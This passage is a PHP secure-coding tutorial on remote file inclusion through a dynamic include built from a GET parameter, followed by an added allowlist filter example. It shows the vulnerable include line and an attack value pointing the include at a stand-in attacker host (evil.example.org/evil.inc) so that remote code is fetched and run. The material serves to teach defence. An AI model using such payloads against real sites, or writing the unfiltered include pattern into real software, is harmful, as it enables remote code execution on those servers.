Code injection
A particularly dangerous situation arises when tainted data is used as the leading part of a dynamic include:
<?php include "{$_GET['path']}/header.inc"; ?>
In this scenario the attacker controls not just the file name but also which resource is included. By default PHP can include not only local files but also remote resources (controlled by allow_url_fopen in the configuration file):
<?php include 'http://www.google.com/'; ?>
This include statement fetches the source of Google's home page and treats it as if it were a local file. The example above is harmless, but imagine that the content returned by Google contained PHP code: it would be parsed and executed. That is exactly the opening an attacker needs to run malicious code inside your application.
Now imagine that the value of the path parameter points to a resource under the attacker's control:
http://www.php.cn/... e.org%2fevil.inc%3f
In the example above the value of path is URL-encoded; after decoding it reads as follows:
http://evil.example.org/evil.inc?
This causes the include statement to fetch and execute a script chosen by the attacker (evil.inc), while the original file name, /header.inc, is merely treated as the query string:
<?php include "http://evil.example.org/evil.inc?/header.inc"; ?>
This spares the attacker from having to guess the remaining directory and file name (/header.inc) and reproduce that same path on evil.example.org. Even when the exact file names used by the targeted site are hidden, the attacker only has to make sure that the output of evil.inc is the code he wants executed.
This is as dangerous as letting an attacker edit the PHP code on your site directly. Fortunately, filtering the data before it reaches include and require statements prevents it:
<?php
$clean = array();
/* $_GET['path'] is filtered and stored in $clean['path']. */
include "{$clean['path']}/header.inc";
?>
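The text leaves the filtering step as a comment. The following added example (not code from the original article) shows one concrete way to fill it in: an allowlist of template directory names, so that a scheme, a query string, or a traversal sequence can never survive into the include. The directory layout (templates/<name>/header.inc), the allowed names, and the sample inputs are all assumptions made for the example; in a real request you would pass $_GET['path'] ?? null in place of the constructed inputs. Independently of input filtering, setting allow_url_include = Off in php.ini (it is off by default) blocks remote includes outright, and allow_url_fopen can be disabled too if the application never opens URLs.

```php
<?php
// Added example, not from the original article: allowlist filtering of the
// "path" parameter before it is used to build an include path.
// Assumed layout: ./templates/<name>/header.inc, where <name> is one of a
// fixed set of directory names known to the application.

declare(strict_types=1);

// Assumed allowlist of template directories the application actually ships.
const ALLOWED_TEMPLATE_DIRS = ['default', 'mobile', 'print'];

/**
 * Return the template directory name if it is exactly one of the allowed
 * values, or null otherwise. Exact matching means no slashes, dots, URL
 * schemes or query strings can pass through.
 */
function clean_template_dir(?string $raw): ?string
{
    if ($raw === null) {
        return null;
    }
    return in_array($raw, ALLOWED_TEMPLATE_DIRS, true) ? $raw : null;
}

/**
 * Build the path that will be handed to include. It starts from the
 * application's own base directory, and only the allowlisted name from
 * clean_template_dir() is spliced into it.
 */
function header_include_path(string $baseDir, ?string $raw): ?string
{
    $dir = clean_template_dir($raw);
    if ($dir === null) {
        return null;
    }
    return $baseDir . '/templates/' . $dir . '/header.inc';
}

// Constructed inputs, as they would arrive after PHP has URL-decoded the
// query string: one legitimate value, the remote-include value from the
// text, and a directory-traversal attempt.
$inputs = [
    'default',
    'http://evil.example.org/evil.inc?',
    '../../etc/passwd',
];

$baseDir = __DIR__;
foreach ($inputs as $raw) {
    $path = header_include_path($baseDir, $raw);
    if ($path === null) {
        // Reject the request. Logging the raw value is useful for detection;
        // it must never reach include.
        error_log('rejected template dir: ' . $raw);
        echo "rejected: $raw\n";
        continue;
    }
    // $path is assembled only from trusted pieces, so including it is safe.
    if (is_file($path)) {
        include $path;
    } else {
        echo "would include: $path\n";
    }
}
```

Run from the command line, the script reports that only the value default produces an include path, while the remote URL and the traversal string are rejected before any file access happens. The same allowlist approach applies to any other user-supplied value that ends up in include, require, or fopen.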